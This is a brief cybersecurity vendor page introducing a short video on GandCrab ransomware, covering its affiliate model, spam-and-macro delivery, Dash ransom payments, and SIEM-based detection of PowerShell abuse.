GandCrab ransomware

GandCrab ransomware encrypts victims’ files and demands ransom payment for data access. It follows an affiliate marketing business model, where low-level cybercriminals find new victims, and the threat authors improve their creation. A malicious spam mail containing a Microsoft Word attachment with a macro to execute PowerShell command downloads the ransomware onto the victim's system.

Ransom notes are placed prominently on the victim’s computer, directing them to a website on the Dark Web where they can decrypt one file of their choosing for free. Ransom payments are made through a cryptocurrency called Dash, and the ransom demands set by the affiliate can range between $600 and $600,000.

A SIEM solution with the MITRE ATT&CK matrix can detect malicious abuse of PowerShell activity in your network, preventing malware download and ensuring protection.

In this video, we talk about what GandCrab is, how it spreads, and ways to mitigate this ransomware Watch the video to learn more—three minutes is all it takes!


Get the latest content delivered
right to your inbox!

Thank you for subscribing.

You will receive regular updates on the latest news on cybersecurity.

  • Please enter a business email id
    By clicking on Keep me Updated you agree to processing of personal data according to the Privacy Policy.

Expert Talks


© 2021 Zoho Corporation Pvt. Ltd. All rights reserved.